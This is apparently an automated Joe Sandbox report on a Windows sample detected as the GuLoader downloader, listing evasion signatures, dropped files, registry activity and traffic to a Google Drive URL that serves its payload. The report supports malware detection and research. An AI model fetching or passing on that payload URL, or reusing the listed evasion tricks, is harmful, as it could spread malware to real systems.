Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Win32.Evo-gen.26137.19757.exe

Overview

General Information

Sample name:SecuriteInfo.com.Win32.Evo-gen.26137.19757.exe
Analysis ID:1617617
MD5:32cb6ae82e91b97ac49e6df5412698a5
SHA1:c1adc2d7d481fc1638676f7c87da93acd6e79318
SHA256:3d29c1dac723e6cfea7beb14513bae42f49f5045f0ac8c9a604ff184045491dd
Tags:exeuser-SecuriteInfoCom
Infos:

Detection

GuLoader
Score:76
Range:0 - 100
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected GuLoader
Joe Sandbox ML detected suspicious sample
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
JA3 SSL client fingerprint seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
SourceRuleDescriptionAuthorStrings
00000004.00000002.2590367791.00000000021A9000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000000.00000002.2309623021.0000000005D19000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      Process Memory Space: SecuriteInfo.com.Win32.Evo-gen.26137.19757.exe PID: 7408JoeSecurity_GuLoader_3Yara detected GuLoaderJoe Security
        No Sigma rule has matched
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-02-18T05:29:22.222978+010028032702Potentially Bad Traffic192.168.2.449787142.250.186.142443TCP

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeVirustotal: Detection: 20%Perma Link
        Source: SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeReversingLabs: Detection: 18%
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
        Source: SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:49787 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 216.58.212.129:443 -> 192.168.2.4:49796 version: TLS 1.2
        Source: SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: mshtml.pdb source: SecuriteInfo.com.Win32.Evo-gen.26137.19757.exe, 00000004.00000001.2299194571.0000000000649000.00000008.00000001.01000000.00000009.sdmp
        Source: Binary string: mshtml.pdbUGP source: SecuriteInfo.com.Win32.Evo-gen.26137.19757.exe, 00000004.00000001.2299194571.0000000000649000.00000008.00000001.01000000.00000009.sdmp
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeCode function: 0_2_00405FFD FindFirstFileA,FindClose,0_2_00405FFD
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeCode function: 0_2_0040559B GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_0040559B
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeCode function: 0_2_00402688 FindFirstFileA,0_2_00402688
        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49787 -> 142.250.186.142:443
        Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1HW-z32VgdxHAatMJ2j1S3-3Si0CkkZFB HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /download?id=1HW-z32VgdxHAatMJ2j1S3-3Si0CkkZFB&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1HW-z32VgdxHAatMJ2j1S3-3Si0CkkZFB HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /download?id=1HW-z32VgdxHAatMJ2j1S3-3Si0CkkZFB&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
        Source: global trafficDNS traffic detected: DNS query: drive.google.com
        Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
        Source: SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
        Source: SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
        Source: Amcache.hve.7.drString found in binary or memory: http://upx.sf.net
        Source: SecuriteInfo.com.Win32.Evo-gen.26137.19757.exe, 00000004.00000001.2299194571.0000000000649000.00000008.00000001.01000000.00000009.sdmpString found in binary or memory: http://www.ftp.ftp://ftp.gopher.
        Source: SecuriteInfo.com.Win32.Evo-gen.26137.19757.exe, 00000004.00000001.2299194571.00000000005F2000.00000008.00000001.01000000.00000009.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
        Source: SecuriteInfo.com.Win32.Evo-gen.26137.19757.exe, 00000004.00000001.2299194571.00000000005F2000.00000008.00000001.01000000.00000009.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
        Source: SecuriteInfo.com.Win32.Evo-gen.26137.19757.exe, 00000004.00000003.2386011859.00000000044FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
        Source: SecuriteInfo.com.Win32.Evo-gen.26137.19757.exe, 00000004.00000002.2593512147.0000000004488000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/R:c
        Source: SecuriteInfo.com.Win32.Evo-gen.26137.19757.exe, 00000004.00000002.2593512147.0000000004488000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/r:C
        Source: SecuriteInfo.com.Win32.Evo-gen.26137.19757.exe, 00000004.00000002.2593512147.00000000044C3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.26137.19757.exe, 00000004.00000002.2593512147.0000000004488000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.26137.19757.exe, 00000004.00000002.2593863216.0000000004720000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1HW-z32VgdxHAatMJ2j1S3-3Si0CkkZFB
        Source: SecuriteInfo.com.Win32.Evo-gen.26137.19757.exe, 00000004.00000002.2593512147.0000000004488000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1HW-z32VgdxHAatMJ2j1S3-3Si0CkkZFBl0
        Source: SecuriteInfo.com.Win32.Evo-gen.26137.19757.exe, 00000004.00000003.2422381970.00000000044F0000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.26137.19757.exe, 00000004.00000003.2423017687.00000000044FA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.26137.19757.exe, 00000004.00000002.2593660655.00000000044FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
        Source: SecuriteInfo.com.Win32.Evo-gen.26137.19757.exe, 00000004.00000002.2593660655.00000000044FC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.26137.19757.exe, 00000004.00000003.2386011859.00000000044FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1HW-z32VgdxHAatMJ2j1S3-3Si0CkkZFB&export=download
        Source: SecuriteInfo.com.Win32.Evo-gen.26137.19757.exe, 00000004.00000003.2422381970.00000000044F0000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.26137.19757.exe, 00000004.00000003.2423017687.00000000044FA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.26137.19757.exe, 00000004.00000002.2593660655.00000000044FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1HW-z32VgdxHAatMJ2j1S3-3Si0CkkZFB&export=downloadn.
        Source: SecuriteInfo.com.Win32.Evo-gen.26137.19757.exe, 00000004.00000001.2299194571.0000000000649000.00000008.00000001.01000000.00000009.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
        Source: SecuriteInfo.com.Win32.Evo-gen.26137.19757.exe, 00000004.00000003.2386011859.00000000044FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
        Source: SecuriteInfo.com.Win32.Evo-gen.26137.19757.exe, 00000004.00000003.2386011859.00000000044FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
        Source: SecuriteInfo.com.Win32.Evo-gen.26137.19757.exe, 00000004.00000003.2386011859.00000000044FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
        Source: SecuriteInfo.com.Win32.Evo-gen.26137.19757.exe, 00000004.00000003.2386011859.00000000044FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
        Source: SecuriteInfo.com.Win32.Evo-gen.26137.19757.exe, 00000004.00000003.2386011859.00000000044FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
        Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
        Source: unknownHTTPS traffic detected: 142.250.186.142:443 -> 192.168.2.4:49787 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 216.58.212.129:443 -> 192.168.2.4:49796 version: TLS 1.2
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeCode function: 0_2_00405050 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405050
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeCode function: 0_2_004030D9 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004030D9
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeFile created: C:\Windows\resources\0809Jump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeCode function: 0_2_004063440_2_00406344
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeCode function: 0_2_0040488F0_2_0040488F
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7880 -s 1928
        Source: SecuriteInfo.com.Win32.Evo-gen.26137.19757.exe, 00000000.00000000.1837812609.0000000000436000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameundfangelsen resurceanvendelser.exeDVarFileInfo$ vs SecuriteInfo.com.Win32.Evo-gen.26137.19757.exe
        Source: SecuriteInfo.com.Win32.Evo-gen.26137.19757.exe, 00000004.00000000.2296549764.0000000000436000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameundfangelsen resurceanvendelser.exeDVarFileInfo$ vs SecuriteInfo.com.Win32.Evo-gen.26137.19757.exe
        Source: SecuriteInfo.com.Win32.Evo-gen.26137.19757.exe, 00000004.00000002.2593927021.0000000005F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAubriella.exe4 vs SecuriteInfo.com.Win32.Evo-gen.26137.19757.exe
        Source: SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeBinary or memory string: OriginalFilenameundfangelsen resurceanvendelser.exeDVarFileInfo$ vs SecuriteInfo.com.Win32.Evo-gen.26137.19757.exe
        Source: SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: classification engineClassification label: mal76.troj.evad.winEXE@4/30@2/2
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeCode function: 0_2_004030D9 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004030D9
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeCode function: 0_2_0040431C GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_0040431C
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeCode function: 0_2_0040205E CoCreateInstance,MultiByteToWideChar,0_2_0040205E
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeFile created: C:\Users\user\Slutafregningers175Jump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7880
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeFile created: C:\Users\user\AppData\Local\Temp\nsr9629.tmpJump to behavior
        Source: SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeVirustotal: Detection: 20%
        Source: SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeReversingLabs: Detection: 18%
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exe"
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exe"
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7880 -s 1928
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exe"Jump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeSection loaded: oleacc.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeSection loaded: shfolder.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeSection loaded: riched20.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeSection loaded: usp10.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeSection loaded: msls31.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeSection loaded: textshaping.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeFile written: C:\Users\user\Slutafregningers175\ammunitionsfabrikkers\Enculturating.iniJump to behavior
        Source: SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: mshtml.pdb source: SecuriteInfo.com.Win32.Evo-gen.26137.19757.exe, 00000004.00000001.2299194571.0000000000649000.00000008.00000001.01000000.00000009.sdmp
        Source: Binary string: mshtml.pdbUGP source: SecuriteInfo.com.Win32.Evo-gen.26137.19757.exe, 00000004.00000001.2299194571.0000000000649000.00000008.00000001.01000000.00000009.sdmp

        Data Obfuscation

        barindex
        Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.Evo-gen.26137.19757.exe PID: 7408, type: MEMORYSTR
        Source: Yara matchFile source: 00000004.00000002.2590367791.00000000021A9000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.2309623021.0000000005D19000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeCode function: 0_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_10001A5D
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeCode function: 0_2_10002D20 push eax; ret 0_2_10002D4E
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeFile created: C:\Users\user\AppData\Local\Temp\nsrA3C7.tmp\System.dllJump to dropped file
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.26137.19757.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
